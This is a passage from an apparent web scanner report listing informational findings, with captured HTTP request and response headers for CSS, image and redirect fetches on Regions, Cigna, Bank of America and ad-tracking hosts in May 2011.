| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:00 GMT Content-Length: 25437 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /styles/stylesprint.css | 
| GET /styles/stylesprint.css HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://securebank User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: max-age=86400 Content-Type: text/css Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT Accept-Ranges: bytes ETag: "05c773bea85ca1:e57b" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:17:01 GMT Content-Length: 32493 BODY {font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;} .pageBackground {background-image:url(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | / | 
| GET / HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:19 GMT Content-length: 261 Content-type: text/html Set-Cookie: TLTHID=8C93EE5E7FD11 Set-Cookie: TLTSID=73F9C9687FD11 Etag: "f2e32241-1-0-105" Last-modified: Sun, 17 Jul 2005 20:01:07 GMT Accept-ranges: bytes <HTML> <HEAD> <META Http-Equiv="Cache-Control <META Http-Equiv="Pragma" Content="no-cache"> <META Http-Equiv="Expires" Content="0"> <META HTTP-EQUIV="Refresh" Content="0 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:39 GMT Content-length: 4668 Content-type: image/gif Set-Cookie: TLTHID=989F512A7FD11 Etag: "62a2347d-1-0-123c" Last-modified: Mon, 19 Jan 2004 19:08:58 GMT Accept-ranges: bytes GIF89a..:.......D........ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/arrow | 
| GET /corp/sso/images/arrow Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "ef1cee75-1-0-3d" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA16587FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/cigna | 
| GET /corp/sso/images/cigna Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "38eba70c-1-0-9ae" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA4F9C7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "7e42fb94-3-0-48c" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7E0907FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:42 GMT Content-length: 1858 Content-type: image/gif Set-Cookie: TLTHID=76094A447FD11 Etag: "50bef55a-8-0-742" Last-modified: Sat, 10 Jan 2004 21:45:32 GMT Accept-ranges: bytes GIF89a..........k..7..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/pshim | 
| GET /corp/sso/images/pshim Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "4c740010-1-0-327" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7FF807FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "8bbd1376-1-0-c0f" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA13387FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/yahoo | 
| GET /corp/sso/images/yahoo Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "c45c439f-1-0-65" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA49AC7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/includes/portal | 
| GET /corp/sso/includes/portal Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 If-None-Match: "4ceaf758-1-0-a3d" Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:27:33 GMT Set-Cookie: TLTHID=67A13BF87FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:46 GMT Content-length: 318 Content-type: image/x-icon Set-Cookie: TLTHID=78D4C8B67FD11 ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://statse.webtre | 
| Path: | /dcs4b71fc10000gs8u8 | 
| GET /dcs4b71fc10000gs8u8 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACOOKIE=C8ctADE3My4x | 
| HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 15:17:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADE3My4x P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67 GIF89a................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://statse.webtre | 
| Path: | /dcspiqc94wz5bdfiwi4 | 
| GET /dcspiqc94wz5bdfiwi4 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://cigna.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACOOKIE=C8ctADE3My4x | 
| HTTP/1.1 303 Object Moved Connection: close Date: Mon, 16 May 2011 15:29:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcspiqc94wz5bdfiwi4 Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4x P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://va.px.invitemedia | 
| Path: | /pixel | 
| GET /pixel?key=segment Host: va.px.invitemedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://s7.addthis.com Cookie: segments_p1="eJzjYuF | 
| HTTP/1.1 302 Found Date: Mon, 16 May 2011 17:09:13 GMT Set-Cookie: segments_p1="eJzjYuF Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Location: http://ad.yieldmanager Content-Length: 0 Connection: close Server: Jetty(7.3.1.v20110307) | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.bankofamerica | 
| Path: | /global/mvc_objects | 
| GET /global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Mon, 16 May 2011 15:28:17 GMT Content-length: 24401 Content-type: text/css Last-modified: Sat, 11 Dec 2010 07:58:13 GMT Etag: "5f51-4d032f15" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /* top level font to cascade */ .standard-font {font-size: 71%; font-family: Verdana,Arial,Geneva .standard-font2 {font-size: 90%; font-family: Verdana,Arial,Geneva ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.mycigna.com | 
| Path: | /rte/public/gatekeeper | 
| GET /rte/public/gatekeeper Host: www.mycigna.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 302 Found content-language: en-US content-length: 0 content-type: text/plain date: Mon, 16 May 2011 15:29:50 GMT location: http://www.mycigna.com p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: TLTSID=56FD59747FD11 Set-Cookie: TLTUID=56FD59747FD11 Set-Cookie: PD_STATEFUL_d77a50f6-4b84 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:15:21 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 13932 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:16:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: https://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 160 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="https://www.regions </body></html> | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/Ems.css | 
| GET /App_Themes/2010/Ems.css HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 21952 Content-Type: text/css Last-Modified: Wed, 09 Mar 2011 20:08:00 GMT Accept-Ranges: bytes ETag: "05054b095decb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:48 GMT .../********************* /* Web Channel Services: Base /************************ .foo{} /************************ /* HTML General /************************ body, h ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 68 Content-Type: image/gif Last-Modified: Fri, 25 Feb 2011 17:31:00 GMT Accept-Ranges: bytes ETag: "0629dc411d5cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:53 GMT GIF89a.......VWQTTRV | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1071 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:53 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 152 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:51 GMT GIF89a................... #4GDD...F0.N...; | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 799 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:51 GMT GIF89a.....`............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 9597 Content-Type: image/png Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT Accept-Ranges: bytes ETag: "08cb2645f3cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:51 GMT .PNG . ...IHDR...~.........D...... .J.........a..r...[.I."M. T\....a....-. ..,... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 9783 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:51 GMT GIF89a..^.......Y....T.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/IE6/Ems.css | 
| GET /App_Themes/IE6/Ems.css HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Set-Cookie: www.regions.com-http Content-Type: text/css Last-Modified: Tue, 15 Mar 2011 18:07:58 GMT Accept-Ranges: bytes ETag: "0d314ea3be3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:02 GMT Content-Length: 19188 .../********************* /* Web Channel Services: Base /************************ .foo{} /************************ /* HTML General /************************ body, h ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/IE6/img | 
| GET /App_Themes/IE6/img Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1071 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:09 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/IE6/img | 
| GET /App_Themes/IE6/img Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 799 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:04 GMT GIF89a.....`............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/IE6/img | 
| GET /App_Themes/IE6/img Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Set-Cookie: www.regions.com-http Content-Length: 9597 Content-Type: image/png Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT Accept-Ranges: bytes ETag: "08cb2645f3cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:24:04 GMT .PNG . ...IHDR...~.........D...... .J.........a..r...[.I."M. T\....a....-. ..,... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /App_Themes/IE6/img | 
